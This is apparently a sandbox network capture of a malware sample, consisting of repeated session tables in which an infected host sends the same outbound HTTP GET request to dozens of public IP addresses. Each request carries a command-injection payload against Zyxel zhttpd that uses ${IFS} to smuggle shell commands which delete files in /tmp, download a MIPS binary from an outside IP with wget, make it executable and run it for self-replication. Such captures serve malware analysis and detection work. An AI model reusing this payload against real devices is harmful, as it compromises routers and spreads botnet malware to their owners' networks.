                                                        Jan 28, 2024 10:12:57.493773937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5606192.168.2.1451470221.57.180.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493801117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5607192.168.2.1458100177.223.229.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493841887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5608192.168.2.1455858129.174.17.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493877888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5609192.168.2.145501625.226.145.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493911028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5610192.168.2.1442510186.58.42.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493948936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5611192.168.2.1443416216.112.241.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494010925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5612192.168.2.14381221.23.141.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494044065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5613192.168.2.1438510185.207.26.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494077921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5614192.168.2.1433738140.87.237.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494123936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5615192.168.2.143996284.71.193.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494153023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5616192.168.2.144968448.171.102.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494180918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5617192.168.2.1452422191.27.75.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494230032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5618192.168.2.1452986154.112.87.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494256973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5619192.168.2.1433644204.73.137.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494302988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5620192.168.2.144075479.91.219.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494338036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5621192.168.2.144436213.16.164.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494374990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5622192.168.2.1456818205.206.50.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494401932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5623192.168.2.1435462105.200.234.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494467974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5624192.168.2.145222427.88.30.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494513035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5625192.168.2.1436706107.56.182.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494541883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5626192.168.2.145531899.6.155.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494594097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5627192.168.2.1459958100.132.156.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494631052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5628192.168.2.1443270151.6.139.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494661093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5629192.168.2.144119041.136.68.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494693995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5630192.168.2.145650491.158.142.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494746923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5631192.168.2.1437386113.66.127.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494781971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5632192.168.2.144473453.89.83.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494826078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5633192.168.2.1444522172.186.179.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494873047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5634192.168.2.14446164.57.101.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494890928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5635192.168.2.1442100107.77.43.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494935989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5636192.168.2.145013051.169.43.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.494982004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5637192.168.2.145929064.161.229.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495028973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5638192.168.2.1453326125.24.148.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495059967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5639192.168.2.143845618.216.162.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495106936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5640192.168.2.1441834206.35.59.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495162964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5641192.168.2.1436590166.40.35.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495198011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5642192.168.2.1449926206.188.1.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495233059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5643192.168.2.1456196175.16.37.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495285034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5644192.168.2.1443666200.153.60.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495311022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5645192.168.2.1439980100.0.13.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495340109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5646192.168.2.1435924146.74.247.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495381117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5647192.168.2.1451334138.150.34.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495404005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5648192.168.2.144376227.146.104.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495457888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5649192.168.2.1449930149.236.206.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495515108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5650192.168.2.1439724185.82.207.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495553017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5651192.168.2.145257686.218.155.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495589018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5652192.168.2.143346852.98.13.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495620012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5653192.168.2.1458700223.170.134.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495678902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5654192.168.2.143554878.190.6.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495711088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5655192.168.2.144831653.153.60.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495754004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5656192.168.2.144390277.7.14.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495800018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5657192.168.2.144701251.208.1.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495835066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5658192.168.2.1447926116.233.216.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495860100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5659192.168.2.145763620.207.30.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495893955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5660192.168.2.145909878.171.125.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.495939016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5661192.168.2.1434372141.133.220.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496015072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5662192.168.2.1460384159.71.182.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496048927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5663192.168.2.1443144125.131.144.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496071100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5664192.168.2.1452602104.171.215.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496113062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5665192.168.2.1449330156.18.193.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496138096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5666192.168.2.1444248223.238.120.154443
                                                        TimestampBytes transferredDirectionData
